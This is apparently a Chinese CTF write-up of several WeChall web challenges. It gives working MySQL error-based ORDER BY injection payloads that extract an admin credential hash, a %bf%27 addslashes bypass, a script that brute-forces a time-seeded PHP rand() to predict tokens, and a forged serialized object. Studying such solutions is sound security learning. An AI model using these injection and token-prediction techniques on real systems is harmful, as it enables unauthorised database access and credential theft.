order by query PHP 看关键代码:
1 2 3 4 5 6 7 if (!in_array($orderby , $whitelist )) { return htmlDisplayError('Error 1010101: Not in whitelist.' ); } $orderby = $db ->escape($orderby );$query = "SELECT * FROM users ORDER BY $orderby $dir LIMIT 10" ;
这里有个php trick
:
1 2 3 4 5 $names = array (1 => 'Username' , 3 => 'Apples' , 4 => 'Bananas' , 5 => 'Cherries' ); $orderby = '5 and 123' ; in_array($orderby, $whitelist) 得到结果为真(1 )。
order by 注入总结: http://www.jinglingshu.org/?p=10105 报错注入:http://joychou.org/index.php/web/SQL-Injections-in-MySQL-LIMIT-clause.html
会返回所有数据,并升序排列。
由于无法使用union
来获取数据,便只能盲注或者报错注入。 本来可以:
这样盲注,但是由于题目有限制,所以这里使用盲注直接得到数据比较方便。
1 3 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2 ))x from information_schema.tables group by x)a) --
来个花式的另一种报错注入方式:
1 ?by =3 PROCEDURE analyse (extractvalue(rand() ,concat (0x3a,database() )),1) --
可以获取数据库名称为gizmore_as2
。 然后是老套路:
1 ?by =3 PROCEDURE analyse (extractvalue(rand() ,concat (0x3a,(select table_name from information_schema.tables where table_schema=0x67697a6d6f72655f617332) )),1) --
0x67697a6d6f72655f617332
可以绕过单引号,表示数据库名gizmore_as2
。得到表名users
。
1 ?by =3 PROCEDURE analyse (extractvalue(rand() ,concat (0x3a,(select column_name from information_schema.columns where table_schema=0x67697a6d6f72655f617332 and table_name=0x7573657273 limit 1,1) )),1) --
得到列名为password
。 最终得到名字和密码:
1 http://www.wechall.net/challenge/order_by_query/index.php?by=3 PROCEDURE analyse (extractvalue(rand() ,concat (0x3a,(select concat(username,0x3a,password) from users limit 2,1))),1) --
GDO Error(1105): XPATH syntax error: ':Admin:3C3CBEB0C8ADC66F2922C65E7'
basic rewrite HTTP 题目简单要求搭建自己的webserver,使用Docker搭建下。后面个题目需要用到大数据加法,于是就这样了: Dokerfile:
1 2 3 4 5 6 7 FROM phpfpm:with_mysqlRUN pear channel-discover phpseclib.sourceforge.net \ && pear install phpseclib/Math_BigInteger CMD ["php-fpm" ]
docker-compose.yml:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 phpfpm_db: build: ./web volumes: - ./web/ webcode:/webcode nginx_server: image: nginx:1.8 links: - phpfpm_db:phpfpm_db volumes: - ./server/ conf/default_server.conf:/etc/ nginx/conf.d/default.conf - ./server/ logs:/var/ log/nginx volumes_from: - phpfpm_db ports: - "8088:80"
写个脚本,让wechall访问:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 import requestsfrom requests.auth import HTTPBasicAuthimport syssession = requests.Session ()def go(): post_data = {'port' :'8088' ,'go' :'I have set it up. Please check my server.' } #url = "http://www.wechall.net/challenge/training/www/basic/index.php"; url = "http://www.wechall.net/challenge/training/www/rewrite/index.php" headers = {"Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.5", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0", "Cookie":"WC=********", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Connection": "keep-alive"} response = session .post(url, headers=headers,data=post_data) print response.text if __name__ == '__main__' : go();
reset to time PHP 可以和0ctf2016
那个random
进行对比。那个更加难一点,参考:http://www.mscs.dal.ca/~selinger/random/ 本题是用了时间作为种子,于是我们只要爆破出时间种子即可。代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 <?php function ttr_random ($len, $alpha='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' ) { $alphalen = strlen($alpha) - 1 ; $key = '' ; for ($i = 0 ; $i < $len; $i++) { $key .= $alpha[rand(0 , $alphalen)]; } return $key; } $csrf = "leqJygumb3PCOytrRRd4hUaGoQEcRhk2" ; $time = time()-500 ; $tmp = "" ; $i = 0 ; for ($i = 0 ;$i < 1000 ;$i++) { srand($time + $i); $tmp = ttr_random(32 ); if ($tmp == $csrf) break ; } echo $tmp."\n" ; echo $i."\n" ; $token = ttr_random(16 ); print $token."\n" ; $res = "qJmSkxxx9rMZXO2I" ; print $token == $res; ?>
得到种子后,结课得到后面生成的验证token。
addslashes 1 2 %bf%27 bypass addslashes function . 0x41646d696e represent 'Admin'
are you serial 一个简单的反序列化问题,如下脚本生成一个序列化对象即可:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php require_once ('serial_user.php' ); require_once ('serial_solution.php' ); $username = "admin" ; $password = "admin" ; $userlevel = 1 ; $user = new SERIAL_User($username, $password, $userlevel); $serial_user = serialize($user); $solution = new SERIAL_Solution(); $serial_solution = serialize($solution); echo $serial_solution; ?>
net ports 发现了curl
一个有意思的参数:
1 2 3 直接加上`--local -port 42 ` curl 'http://www.wechall.net/challenge/training/net/ports/index.php' --local -port 42 -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: zh-CN,zh;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: http://www.wechall.net/challs/HTTP/by/chall_score/ASC/page-1' -H 'Cookie: WC=***' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' --compressed